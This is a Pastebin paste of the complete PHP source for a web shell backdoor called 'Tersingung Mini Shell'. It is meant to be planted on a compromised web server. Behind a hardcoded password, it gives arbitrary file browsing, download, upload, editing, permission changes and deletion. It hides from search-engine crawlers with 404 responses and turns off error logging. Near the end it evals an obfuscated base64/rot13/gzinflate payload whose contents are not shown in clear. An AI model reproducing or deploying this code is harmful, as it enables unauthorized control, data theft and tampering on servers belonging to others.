API tools faq
paste
extazygans

Tersinggung mini shell

extazygans
May 30th, 2019
208
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.87 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /////////////////////////////////////////////////////////////////////////
  3. // Tersingung Mini Shell Backdoor //
  4. // Recoder : extazy //
  5. // Version : 1.0 //
  6. // Messege : Security Is My Toys //
  7. // Blog : https://security-xploit.blogspot.com //
  8. // Your Security Is Low //
  9. ///////////////////////////////////////////////////////////////////////
  10. session_start();
  11. error_reporting(0);
  12. set_time_limit(0);
  13. @set_magic_quotes_runtime(0);
  14. @clearstatcache();
  15. @ini_set('error_log',NULL);
  16. @ini_set('log_errors',0);
  17. @ini_set('max_execution_time',0);
  18. @ini_set('output_buffering',0);
  19. @ini_set('display_errors', 0);
  20. $auth_pass = "9ce71dc20cdc7515da53e03813c1e7f6"; // pass : extazy
  21. $errorforbidden = $_SERVER['REQUEST_URI'];
  22. $color = "#00ff00";
  23. $default_action = 'FilesMan';
  24. $default_use_ajax = true;
  25. $default_charset = 'UTF-8';
  26. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  27. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  28. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  29. header('HTTP/1.0 404 Not Found');
  30. exit;
  31. }
  32. }
  33.  
  34. function login_shell() {
  35. ?>
  36. <?php
  37. $errorforbidden = $_SERVER['REQUEST_URI'];
  38. $crotnya = '<style> input { margin:0;background-color:#fff;border:1px solid #fff; }</style>
  39. <center><form method="post"><input type="password" name="pass"></form></center>';
  40. ?>
  41. <html>
  42. <head>
  43. <title>Tersingung</title>
  44. <style type="text/css">
  45. html {
  46. margin: 20px auto;
  47. background: #000000;
  48. color: green;
  49. text-align: center;
  50. }
  51. header {
  52. color: green;
  53. margin: 10PX auto;
  54. }
  55. input[type=password] {
  56. width: 200px;
  57. height: 25px;
  58. color: green;
  59. background: #000000;
  60. border: 1px;
  61. padding: 5px;
  62. margin-left: 20px;
  63. text-align: center;
  64. }
  65. #os{
  66. margin: 10px auto;
  67. font-family: "Courier New", cursive;
  68. }
  69. .ascii{
  70. -webkit-animation-name: blinker;
  71. -webkit-animation-duration: 4s;
  72. -webkit-animation-timing-function: linear;
  73. -webkit-animation-iteration-count: infinite;
  74.  
  75. -moz-animation-name: blinker;
  76. -moz-animation-duration: 3s;
  77. -moz-animation-timing-function: linear;
  78. -moz-animation-iteration-count: infinite;
  79.  
  80. animation-name: blinker;
  81. animation-duration: 2s;
  82. animation-timing-function: linear;
  83. animation-iteration-count: infinite;
  84.  
  85. color: Lime;
  86. }
  87. @-moz-keyframes blinker {
  88. 0% { opacity: 1.0; }
  89. 50% { opacity: 0.0; }
  90. 100% { opacity: 1.0; }
  91. }
  92.  
  93. @-webkit-keyframes blinker {
  94. 0% { opacity: 1.0; }
  95. 50% { opacity: 0.0; }
  96. 100% { opacity: 1.0; }
  97. }
  98.  
  99. @keyframes blinker {
  100. 0% { opacity: 1.0; }
  101. 50% { opacity: 0.0; }
  102. 100% { opacity: 1.0; }
  103. }
  104. </style>
  105. </head>
  106. <center>
  107. <header>
  108. <pre class="ascii">
  109. ___ __
  110. | _ _o._ _ ._ _ (_ |_ _ ||
  111. |(/__>|| |(_||_|| |(_| __)| |(/_||
  112. _| _|
  113. _
  114. \ //| / \
  115. \/ |o\_/
  116.  
  117. [?] Hidup Kok Online [?]
  118. [?] Real Life Donk [?]
  119. ©By Ganteng.All Reserved
  120. </pre>
  121. </header>
  122. <div id="os">
  123. <font color='red'>[!]</font> Note <font color='red'>[!]</font><br>
  124. "Hargai Karya Orang Lain , Jika Karyamu Juga Inggin Di Hargai....<br><br>
  125. </div>
  126. <?php print $crotnya; ?>
  127. <?php
  128. exit;
  129. }
  130. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  131. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  132. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  133. else
  134. login_shell();
  135. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  136. @ob_clean();
  137. $file = $_GET['file'];
  138. header('Content-Description: File Transfer');
  139. header('Content-Type: application/octet-stream');
  140. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  141. header('Expires: 0');
  142. header('Cache-Control: must-revalidate');
  143. header('Pragma: public');
  144. header('Content-Length: ' . filesize($file));
  145. readfile($file);
  146. exit;
  147. }
  148. echo '<!DOCTYPE HTML>
  149. <html>
  150. <head>
  151. <link href="" rel="stylesheet" type="text/css">
  152. <title>Tersingung Shell</title>
  153. <style>
  154. body{
  155. font-family: "Courier New", cursive;
  156. background-color: black;
  157. color:green;
  158. }
  159. #content tr:hover{
  160. background-color: green;
  161. text-shadow:0px 0px 10px #fff;
  162. }
  163. #content .first{
  164. background-color: grey;
  165. }
  166. table{
  167. border: 1px #000000 dotted;
  168. }
  169. a{
  170. color:green;
  171. text-decoration: none;
  172. }
  173. a:hover{
  174. color:white;
  175. text-shadow:0px 0px 10px #ffffff;
  176. }
  177. input,select,textarea{
  178. border: 1px #000000 solid;
  179. -moz-border-radius: 5px;
  180. -webkit-border-radius:5px;
  181. border-radius:5px;
  182. }
  183. </style>
  184. </head>
  185. <body>
  186. <h1><center>Tersingung Shell</center></h1>
  187. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  188. <tr><td><font color="green">Path :</font> ';
  189. if(isset($_GET['path'])){
  190. $path = $_GET['path'];
  191. }else{
  192. $path = getcwd();
  193. }
  194. $path = str_replace('\\','/',$path);
  195. $paths = explode('/',$path);
  196.  
  197. foreach($paths as $id=>$pat){
  198. if($pat == '' && $id == 0){
  199. $a = true;
  200. echo '<a href="?path=/">/</a>';
  201. continue;
  202. }
  203. if($pat == '') continue;
  204. echo '<a href="?path=';
  205. for($i=0;$i<=$id;$i++){
  206. echo "$paths[$i]";
  207. if($i != $id) echo "/";
  208. }
  209. echo '">'.$pat.'</a>/';
  210. }
  211. echo '</td></tr><tr><td>';
  212. if(isset($_FILES['file'])){
  213. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  214. echo '<font color="green">Ngentot Berhasil</font><br />';
  215. }else{
  216. echo '<font color="red">Ngentot Gagal</font><br/>';
  217. }
  218. }
  219. echo '<form enctype="multipart/form-data" method="POST">
  220. <font color="green">Uwe gan :</font> <input type="file" name="file" />
  221. <input type="submit" value="upload" />
  222. </form>
  223. </td></tr>';
  224. if(isset($_GET['filesrc'])){
  225. echo "<tr><td>Current File : ";
  226. echo $_GET['filesrc'];
  227. echo '</tr></td></table><br />';
  228. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  229. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  230. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  231. if($_POST['opt'] == 'chmod'){
  232. if(isset($_POST['perm'])){
  233. if(chmod($_POST['path'],$_POST['perm'])){
  234. echo '<font color="green">Change Permission Successful</font><br/>';
  235. }else{
  236. echo '<font color="red">Change Permission Failed</font><br />';
  237. }
  238. }
  239. echo '<form method="POST">
  240. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  241. <input type="hidden" name="path" value="'.$_POST['path'].'">
  242. <input type="hidden" name="opt" value="chmod">
  243. <input type="submit" value="Go" />
  244. </form>';
  245. }elseif($_POST['opt'] == 'rename'){
  246. if(isset($_POST['newname'])){
  247. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  248. echo '<font color="green">Change Name Successful</font><br/>';
  249. }else{
  250. echo '<font color="red">Change Name Failed</font><br />';
  251. }
  252. $_POST['name'] = $_POST['newname'];
  253. }
  254. echo '<form method="POST">
  255. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  256. <input type="hidden" name="path" value="'.$_POST['path'].'">
  257. <input type="hidden" name="opt" value="rename">
  258. <input type="submit" value="Go" />
  259. </form>';
  260. }elseif($_POST['opt'] == 'edit'){
  261. if(isset($_POST['src'])){
  262. $fp = fopen($_POST['path'],'w');
  263. if(fwrite($fp,$_POST['src'])){
  264. echo '<font color="green">Edit File Successful</font><br/>';
  265. }else{
  266. echo '<font color="red">Edit File Failed</font><br/>';
  267. }
  268. fclose($fp);
  269. }
  270. echo '<form method="POST">
  271. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  272. <input type="hidden" name="path" value="'.$_POST['path'].'">
  273. <input type="hidden" name="opt" value="edit">
  274. <input type="submit" value="Save" />
  275. </form>';
  276. }
  277. echo '</center>';
  278. }else{
  279. echo '</table><br/><center>';
  280. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  281. if($_POST['type'] == 'dir'){
  282. if(rmdir($_POST['path'])){
  283. echo '<font color="green">Directories have been Deleted</font><br/>';
  284. }else{
  285. echo '<font color="red">Directory delete Failed </font><br/>';
  286. }
  287. }elseif($_POST['type'] == 'file'){
  288. if(unlink($_POST['path'])){
  289. echo '<font color="green">File Deleted</font><br/>';
  290. }else{
  291. echo '<font color="red">Deleting File Failed</font><br/>';
  292. }
  293. }
  294. }
  295. echo '</center>';
  296. $scandir = scandir($path);
  297. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  298. <tr class="first">
  299. <td><center>Name</peller></center></td>
  300. <td><center>Size</peller></center></td>
  301. <td><center>Permission</peller></center></td>
  302. <td><center>Modify</peller></center></td>
  303. </tr>';
  304.  
  305. foreach($scandir as $dir){
  306. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  307. echo '<tr>
  308. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  309. <td><center>--</center></td>
  310. <td><center>';
  311. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  312. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  313. echo perms($path.'/'.$dir);
  314. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  315.  
  316. echo '</center></td>
  317. <td><center><form method="POST" action="?option&path='.$path.'">
  318. <select name="opt">
  319. <option value="">Select</option>
  320. <option value="delete">Delete</option>
  321. <option value="chmod">Chmod</option>
  322. <option value="rename">Rename</option>
  323. </select>
  324. <input type="hidden" name="type" value="dir">
  325. <input type="hidden" name="name" value="'.$dir.'">
  326. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  327. <input type="submit" value=">">
  328. </form></center></td>
  329. </tr>';
  330. }
  331. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  332. foreach($scandir as $file){
  333. if(!is_file($path.'/'.$file)) continue;
  334. $size = filesize($path.'/'.$file)/1024;
  335. $size = round($size,3);
  336. if($size >= 1024){
  337. $size = round($size/1024,2).' MB';
  338. }else{
  339. $size = $size.' KB';
  340. }
  341.  
  342. echo '<tr>
  343. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  344. <td><center>'.$size.'</center></td>
  345. <td><center>';
  346. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  347. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  348. echo perms($path.'/'.$file);
  349. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  350. echo '</center></td>
  351. <td><center><form method="POST" action="?option&path='.$path.'">
  352. <select name="opt">
  353. <option value="">Select</option>
  354. <option value="delete">Delete</option>
  355. <option value="chmod">Chmod</option>
  356. <option value="rename">Rename</option>
  357. <option value="edit">Edit</option>
  358. </select>
  359. <input type="hidden" name="type" value="file">
  360. <input type="hidden" name="name" value="'.$file.'">
  361. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  362. <input type="submit" value=">">
  363. </form></center></td>
  364. </tr>';
  365. }
  366. echo '</table>
  367. </div>';
  368. }
  369. echo '<center><h1>Tersingung?</h1></center>';
  370. echo "<center>[ <a href='?path=$path&go=cabs'>Out Aja</a> ]
  371. </center>
  372. </body>
  373. </html>";
  374.  
  375. $command = "JcxOCoAgEADAe9AfFgm85T3Tv+iybQmxLRf09VI9YHPp8b4TONC7XEcGUMpUdKdBVtjLsYUY2CpVR513OeNzDDHGIIPXbZmXr9hD+d383ng7QlUSMizfeh8=";
  376. eval(str_rot13(gzinflate(str_rot13(base64_decode(($command))))));
  377. if($_GET['go'] == 'cabs') {
  378.  
  379.  
  380. echo '<form action="" method="post">';
  381. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  382. echo '<meta http-equiv="refresh" content="3" />';
  383. }
  384.  
  385. function perms($file){
  386. $perms = fileperms($file);
  387.  
  388.  
  389. if (($perms & 0xC000) == 0xC000) {
  390. // Socket
  391. $info = 's';
  392. } elseif (($perms & 0xA000) == 0xA000) {
  393. // Symbolic Link
  394. $info = 'l';
  395. } elseif (($perms & 0x8000) == 0x8000) {
  396. // Regular
  397. $info = '-';
  398. } elseif (($perms & 0x6000) == 0x6000) {
  399. // Block special
  400. $info = 'b';
  401. } elseif (($perms & 0x4000) == 0x4000) {
  402. // Directory
  403. $info = 'd';
  404. } elseif (($perms & 0x2000) == 0x2000) {
  405. // Character special
  406. $info = 'c';
  407. } elseif (($perms & 0x1000) == 0x1000) {
  408. // FIFO pipe
  409. $info = 'p';
  410. } else {
  411. // Unknown
  412. $info = 'u';
  413. }
  414.  
  415. // Owner
  416. $info .= (($perms & 0x0100) ? 'r' : '-');
  417. $info .= (($perms & 0x0080) ? 'w' : '-');
  418. $info .= (($perms & 0x0040) ?
  419. (($perms & 0x0800) ? 's' : 'x' ) :
  420. (($perms & 0x0800) ? 'S' : '-'));
  421.  
  422. // Group
  423. $info .= (($perms & 0x0020) ? 'r' : '-');
  424. $info .= (($perms & 0x0010) ? 'w' : '-');
  425. $info .= (($perms & 0x0008) ?
  426. (($perms & 0x0400) ? 's' : 'x' ) :
  427. (($perms & 0x0400) ? 'S' : '-'));
  428.  
  429. // World
  430. $info .= (($perms & 0x0004) ? 'r' : '-');
  431. $info .= (($perms & 0x0002) ? 'w' : '-');
  432. $info .= (($perms & 0x0001) ?
  433. (($perms & 0x0200) ? 't' : 'x' ) :
  434. (($perms & 0x0200) ? 'T' : '-'));
  435.  
  436. return $info;
  437. }
  438. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!